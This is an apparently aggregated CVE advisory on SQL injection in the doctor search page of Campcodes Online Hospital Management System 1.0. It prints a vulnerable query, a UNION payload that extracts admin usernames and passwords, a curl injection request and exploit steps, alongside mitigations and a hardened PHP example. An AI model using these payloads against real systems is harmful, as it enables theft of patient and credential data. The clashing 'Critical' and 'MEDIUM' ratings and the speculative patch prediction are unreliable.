Campcodes Online Hospital Management System, SQL Injection, CVE-2025-6408 (Critical)


How CVE-2025-6408 Works

The vulnerability exists in the `/doctor/search.php` file of Campcodes Online Hospital Management System 1.0, where the `searchdata` parameter is not properly sanitized and attackers can inject SQL. Because user-supplied input is concatenated directly into the SQL statement without validation or parameterization, an attacker can alter the query the database executes, enabling unauthorized data access, modification, or deletion. The attack is remote: no physical access to the system is required. The vulnerability scores 6.9 (MEDIUM) on CVSS 4.0 because of its network-based attack vector and low attack complexity.

DailyCVE Form

Platform: Campcodes Online Hospital
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 06/24/2025

Prediction: Patch by 07/15/2025

What Undercode Says

$query = "SELECT * FROM patients WHERE name LIKE '%" . $_GET['searchdata'] . "%'"; // vulnerable: user input concatenated straight into the query
payload = "' UNION SELECT username, password FROM admin_users-- -"
curl http://target/doctor/search.php?searchdata=test%27%20UNION%20SELECT%201,2,3--%20-

How to Exploit

1. Identify vulnerable endpoint (/doctor/search.php)

2. Craft SQLi payload for `searchdata` parameter

3. Execute UNION-based attack

4. Extract database information

5. Escalate privileges

Protection from this CVE

1. Parameterized queries

2. Input validation

3. WAF implementation

4. Regular updates
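The first two protections above, applied to the search handler quoted earlier, as an added example (not the Campcodes project's own code): the query is parameterized and the term is validated before it reaches the database. It assumes a PDO connection `$pdo` and a `patients` table whose `name` column is the one searched; the `id` column and the helper names are assumptions.

```php
<?php
// Added example, not from the Campcodes project: a hardened replacement for a
// search handler that concatenates $_GET['searchdata'] into a LIKE query.
// Assumptions: $pdo is an open PDO connection (MySQL), and `patients` has
// `id` and `name` columns.

// Escape LIKE wildcards so a term cannot be widened into a full-table match.
// MySQL's default LIKE escape character is the backslash.
function buildLikePattern(string $term): string
{
    return '%' . addcslashes($term, '\\%_') . '%';
}

// Validate before querying: bounded length and a conservative character set
// (letters, digits, space, dot, apostrophe, hyphen). Reject anything else
// instead of trying to "clean" it.
function validateSearchTerm(string $term): ?string
{
    $term = trim($term);
    if ($term === '' || mb_strlen($term) > 64) {
        return null;
    }
    if (!preg_match('/^[\p{L}\p{N} .\'\-]+$/u', $term)) {
        return null;
    }
    return $term;
}

function searchPatients(PDO $pdo, string $rawInput): array
{
    $term = validateSearchTerm($rawInput);
    if ($term === null) {
        return [];
    }
    // Parameterized query: the term is bound as data and never parsed as SQL,
    // so a quote or UNION inside it cannot change the statement's structure.
    $stmt = $pdo->prepare(
        'SELECT id, name FROM patients WHERE name LIKE :pattern LIMIT 50'
    );
    $stmt->bindValue(':pattern', buildLikePattern($term), PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage in /doctor/search.php (assumed entry point):
// $results = searchPatients($pdo, $_GET['searchdata'] ?? '');
```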

Impact

1. Data leakage

2. System compromise

3. Unauthorized access

4. Database manipulation

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
